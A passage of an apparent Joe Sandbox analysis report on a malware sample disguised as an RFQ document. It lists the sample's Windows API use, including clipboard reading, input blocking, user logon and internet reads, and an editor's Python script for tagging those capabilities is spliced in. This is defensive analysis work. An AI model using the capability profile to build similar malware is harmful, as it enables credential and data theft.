                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                        • String ID:
                                                        • API String ID: 292994002-0
                                                        • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                        • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                        • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                        • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                        APIs
                                                          • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                        • CoInitialize.OLE32(00000000), ref: 00478442
                                                        • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                        • CoUninitialize.OLE32 ref: 0047863C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                        • String ID: .lnk
                                                        • API String ID: 886957087-24824748
                                                        • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                        • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                        • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                        • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                        APIs
                                                        • OpenClipboard.USER32(?), ref: 0046DCE7
                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                        • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                        • CloseClipboard.USER32 ref: 0046DD0D
                                                        • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                        • CloseClipboard.USER32 ref: 0046DD41
                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                        • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                        • CloseClipboard.USER32 ref: 0046DD99
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                        • String ID:
                                                        • API String ID: 15083398-0
                                                        • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                        • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                        • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                        • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
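The records above list each function's imported API calls with their rendered stack arguments and the memory-dump regions they were recovered from, but the report does not interpret them. The script below is an added example written by the editor, not Joe Sandbox output and not part of the sample: it parses records in this page's text layout (the "APIs" list, "API ID" and "String ID" lines) and tags observed capabilities, covering the Toolhelp32 process-enumeration record, the clipboard-read record (formats 0x0000000D = CF_UNICODETEXT and 0x00000001 = CF_TEXT) and the IsDebuggerPresent record. The tagging rules, the region lookup and the argument decoding are the editor's own. Two assumptions are worth stating: first, when the report shows an argument such as UnhandledExceptionFilter.KERNEL32(pqI), the decoder treats it as a 32-bit value whose bytes happened to be printable, so pqI becomes 0x00497170, an address that falls after the 0x00492000 dump start listed under Memory Dump Source; second, the sequence SetUnhandledExceptionFilter(NULL), UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess with exit status 0xC0000409 (STATUS_STACK_BUFFER_OVERRUN) is the MSVC runtime's __raise_securityfailure path, so the IsDebuggerPresent call in that record is compiler-generated rather than an anti-debugging check of the malware's own, and the script labels it that way. The sample input is constructed from records on this page.

```python
"""Triage helper for Joe Sandbox function-analysis records (added example, editor's own code)."""
import re
from dataclasses import dataclass, field

# Constructed input: three API records copied in this report's text layout.
SAMPLE = """\
APIs
• IsDebuggerPresent.KERNEL32 ref: 00421FC1
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
• UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
• GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
• TerminateProcess.KERNEL32(00000000), ref: 00422004
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
• String ID: pqI
APIs
• OpenClipboard.USER32(?), ref: 0046DCE7
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
• GetClipboardData.USER32(0000000D), ref: 0046DD01
• CloseClipboard.USER32 ref: 0046DD0D
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
• Process32NextW.KERNEL32(00000000,?), ref: 004756AB
• CloseHandle.KERNEL32(00000000), ref: 004756BA
"""

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
HEX32 = re.compile(r"^[0-9A-Fa-f]{8}$")
STATUS_STACK_BUFFER_OVERRUN = 0xC0000409
CF_NAMES = {1: "CF_TEXT", 13: "CF_UNICODETEXT"}
# Region starts taken from the report's "Memory Dump Source" entries; sizes are not listed.
DUMP_STARTS = [0x401000, 0x482000, 0x490000, 0x491000, 0x492000, 0x4A7000, 0x4AB000]

@dataclass
class Call:
    name: str
    module: str
    args: list   # one int per argument, None where the report shows '?'
    ref: int

@dataclass
class Record:
    calls: list = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""
    tags: list = field(default_factory=list)

def decode_arg(tok):
    """'0000000D' -> 13, '?' -> None, 'pqI' -> 0x00497170. The last case assumes
    the report prints a 32-bit stack value as text when its bytes are printable."""
    tok = tok.strip()
    if tok in ("", "?"):
        return None
    if HEX32.match(tok):
        return int(tok, 16)
    return int.from_bytes(tok.encode("latin-1", "replace")[:4], "little")

def region_start(addr, starts=DUMP_STARTS):
    """Highest listed dump start at or below addr, or None if addr is below all of them."""
    below = [s for s in starts if s <= addr]
    return max(below) if below else None

def classify(rec):
    """Editor's capability rules over the API names and decoded arguments of one record."""
    names = {c.name for c in rec.calls}
    all_args = {a for c in rec.calls for a in c.args if a is not None}
    tags = []
    if {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"} <= names:
        tags.append("process enumeration via Toolhelp32 snapshot")
    if {"FindFirstFileW", "FindNextFileW"} <= names:
        tags.append("directory walk via FindFirstFileW/FindNextFileW")
    if {"OpenClipboard", "GetClipboardData"} <= names:
        fmts = sorted(CF_NAMES.get(a, hex(a)) for c in rec.calls
                      if c.name == "GetClipboardData" for a in c.args if a is not None)
        tags.append("clipboard read: " + ", ".join(fmts))
    if names & {"SendInput", "mouse_event", "SetKeyboardState"}:
        tags.append("synthetic keyboard/mouse input")
    if any(c.name == "socket" and c.args[:3] == [2, 2, 0x11] for c in rec.calls):
        tags.append("UDP socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP)")
    if ({"SetUnhandledExceptionFilter", "UnhandledExceptionFilter", "TerminateProcess"} <= names
            and STATUS_STACK_BUFFER_OVERRUN in all_args):
        tags.append("CRT __raise_securityfailure (exit status 0xC0000409): "
                    "IsDebuggerPresent here is compiler runtime code, not an anti-debug check")
    return tags

def parse_records(text):
    """Split the text at each 'APIs' header and collect calls, API ID and String ID per record."""
    records, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = Record()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            raw = m.group("args")
            args = [decode_arg(a) for a in raw.split(",")] if raw is not None else []
            cur.calls.append(Call(m.group("name"), m.group("mod"), args, int(m.group("ref"), 16)))
        elif s.startswith("• API ID:"):
            cur.api_id = s.split(":", 1)[1].strip()
        elif s.startswith("• String ID:"):
            cur.string_id = s.split(":", 1)[1].strip()
    for rec in records:
        rec.tags = classify(rec)
    return records

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.api_id or "(no API ID)")
        for c in rec.calls:
            shown = ["?" if a is None else f"0x{a:X}" for a in c.args]
            print(f"  {c.name}.{c.module} @ {c.ref:08X} {shown}")
        for t in rec.tags:
            print("  ->", t)
```

Feed it the text of a report's function-analysis section to get one tagged record per "APIs" block. The decoded pointer 0x00497170 and the region lookup are only as precise as the dump list allows: the report gives region start addresses but not sizes, so region_start reports the nearest listed start at or below an address, nothing more.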
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: U$\
                                                        • API String ID: 4104443479-100911408
                                                        • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                        • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                        • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                        • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNext
                                                        • String ID:
                                                        • API String ID: 3541575487-0
                                                        • Opcode ID: f8ec562d354739d1813db85dcf23f13665d7d9b039f732a3c66120ad17a42715
                                                        • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                        • Opcode Fuzzy Hash: f8ec562d354739d1813db85dcf23f13665d7d9b039f732a3c66120ad17a42715
                                                        • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                        APIs
                                                        • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                        • FindClose.KERNEL32(00000000), ref: 004339EB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: FileFind$AttributesCloseFirst
                                                        • String ID:
                                                        • API String ID: 48322524-0
                                                        • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                        • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                        • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                        • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                        APIs
                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                        • String ID:
                                                        • API String ID: 901099227-0
                                                        • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                        • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                        • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                        • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                        APIs
                                                        • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Proc
                                                        • String ID:
                                                        • API String ID: 2346855178-0
                                                        • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                        • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                        • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                        • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                        APIs
                                                        • BlockInput.USER32(00000001), ref: 0045A38B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: BlockInput
                                                        • String ID:
                                                        • API String ID: 3456056419-0
                                                        • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                        • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                        • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                        • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                        APIs
                                                        • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: LogonUser
                                                        • String ID:
                                                        • API String ID: 1244722697-0
                                                        • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                        • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                        • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                        • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                        APIs
                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: NameUser
                                                        • String ID:
                                                        • API String ID: 2645101109-0
                                                        • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                        • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                        • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                        • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                        • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                        • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                        • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: N@
                                                        • API String ID: 0-1509896676
                                                        • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                        • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                        • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                        • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                        • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                        • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                        • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
